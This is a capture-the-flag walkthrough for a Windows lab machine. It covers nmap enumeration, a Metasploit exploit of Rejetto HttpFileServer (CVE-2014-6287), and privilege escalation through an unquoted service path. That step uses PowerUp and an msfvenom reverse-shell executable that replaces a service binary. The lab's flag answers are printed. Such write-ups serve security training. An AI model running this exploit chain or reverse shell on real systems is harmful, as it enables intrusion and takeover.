Nmap

nmap -sC -sV <MACHINE-IP>
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-05-09T12:58:47
|_Not valid after:  2023-11-08T12:58:47
8080/tcp  open  http               HttpFileServer httpd 2.3
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown

=======================================================

=======================================================

1. Who is the employee of the month?

On Navigating to http://<Machine-IP>:80

On Inspecting the Page Source, we can found his name

Ans: Bill Harper

=======================================================

=======================================================

1. Scan the machine with nmap. What is the other port running a web server on?

Ans: 8080

2. Take a look at the other web server. What file server is running?

We found that it is Http File Server but that’s not the answer

Ans: Rejetto Http File Server

3. What is the CVE number to exploit this file server?

Ans: 2014-6287

4. Use Metasploit to get an initial shell. What is the user flag?

1. Start metasploit and search for rejetto

search rejetto
use 0
show options

Also, set the Port to 8080 using the Command set RPORT 8080

You will get the Meterpreter Shell

2. Let’s move to the bill’s Directory

cd C:\\Users\\bill\\

3. Let’s Search for the User.txt using the command search -f user.txt

4. Cd into the Directory

cd C:\\Users\\bill\\Desktop\\
cat user.txt

We Found the Flag

Ans: b04763b6fcf51fcd7c13abc7db4fd365

=======================================================

=======================================================

1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

1. Open a New Terminal and download the below Powershell Command File

wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

2. Now on the Metasploit type the below command to upload the file to the target machine (Make sure to enter your Download Location)

upload <FILE_LOCATION>
load powershell
powershell_shell

3. Move to the Directory where you downloaded the Powershell file and then type the Following Commands

 . .\PowerUp.ps1
Invoke-AllChecks

Ans: AdvancedSystemCareService9

2. What is the root flag?

Let’s create a Payload using the below command

msfvenom -p windows/shell_reverse_tcp LHOST=<Machine-IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

sc stop AdvancedSystemCareService9
upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Recieved Connection

Ans: 9af5f314f57607c00fd09803a587db80

=======================================================

=======================================================

1. What powershell -c command could we run to manually find out the service name?

Format is “powershell -c “command here”*

Ans: powershell -c Get-Service